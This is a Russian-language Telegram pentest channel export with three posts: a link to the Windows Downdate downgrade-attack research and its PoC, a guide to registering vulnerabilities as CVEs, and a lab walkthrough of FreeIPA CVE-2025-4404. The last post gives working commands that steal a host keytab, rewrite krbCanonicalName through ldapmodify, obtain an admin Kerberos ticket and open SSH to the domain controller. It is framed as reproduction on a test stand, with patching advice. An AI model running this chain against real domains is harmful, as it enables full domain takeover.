[PoC Windows Downdate]
Всем привет!👋
Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.
Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates
Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам!👍
Для понимания рекомендую к прочтению публикацию📝
💻 И уже даже есть PoC с примерами от автора!
🐤 Ну и конечно ссылка на автора.
#Windows #PoC #AD #DC32 #BH2024 #CVE
Всем привет!
Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.
Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates
Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам!
Для понимания рекомендую к прочтению публикацию
#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍5❤2👌2🦄1
[Регистрация уязвимостей]
Всем привет!👋
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.🐈
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.📝
Иногда бывают различные выдающиеся случаи💻 , о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.🔥
#cve #learn #notes
Всем привет!
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.
Иногда бывают различные выдающиеся случаи
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.
#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥9❤4🥰1🌭1
[FreeIPA CVE-2025-4404]
Всем привет!👋
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)
🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)
🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT
Обычно он лежит по пути
Чтобы убедиться, что keytab принадлежит машине можно сделать
Там должно быть что-то типа такого
🔘 Этап 2. Получение TGT
Копируем полученный keytab себе на машину по тому же пути
🔘 Этап 3. Подмена krbCanonicalName в LDAP
Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = [email protected].
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
Применяем:
🔘 Этап 4. Получение TGT уже с именем [email protected]
Видим что-то типа:
🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣 Подробности в официальных источниках
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Всем привет!
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
Обычно он лежит по пути
/etc/krb5.keytab
Чтобы убедиться, что keytab принадлежит машине можно сделать
klist -k /etc/krb5.keytab
Там должно быть что-то типа такого
host/[email protected]
Копируем полученный keytab себе на машину по тому же пути
/etc/krb5.keytab
и потом выполняем команды:kinit -k host/client.test.local
klist
Вся соль начинается здесь:
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: [email protected]
Применяем:
ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif
kinit -k host/client.test.local
klist
Видим что-то типа:
Default principal: [email protected]
ssh [email protected]
whoami
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍8❤4🌭1🦄1